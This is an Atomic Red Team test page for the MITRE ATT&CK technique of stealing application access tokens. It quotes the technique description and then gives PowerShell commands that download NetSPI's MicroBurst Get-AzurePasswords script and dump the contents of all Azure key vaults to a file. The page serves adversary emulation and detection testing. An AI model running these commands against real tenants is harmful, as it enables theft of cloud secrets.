# T1528 - Steal Application Access Token
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1528)
<blockquote>Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst](#atomic-test-1---azure---dump-all-azure-key-vaults-with-microburst)


<br/>

## Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst
Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/

**Supported Platforms:** Iaas:azure


**auto_generated_guid:** 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Azure AD username | string | |
| password | Azure AD password | string | T1082Az|
| output_file | File to dump results to | string | $env:temp&#92;T1528Test1.txt|
| subscription_id | Azure subscription id to search | string | |


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
import-module "$env:temp\Get-AzurePasswords.ps1"
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzureRmAccount -Credential $Credential
Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
cat #{output_file}
```

#### Cleanup Commands:
```powershell
remove-item #{output_file} -force -erroraction silentlycontinue
```



#### Dependencies:  Run with `powershell`!
##### Description: The Get-AzurePasswords script must exist in $env:temp.
##### Check Prereq Commands:
```powershell
if (test-path $env:temp\Get-AzurePasswords.ps1){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "$env:temp\Get-AzurePasswords.ps1"
```
##### Description: The Azure RM module must be installed.
##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureRM -Force -allowclobber
```
##### Description: The Azure module must be installed.
##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name Azure -Force -allowclobber
```




<br/>
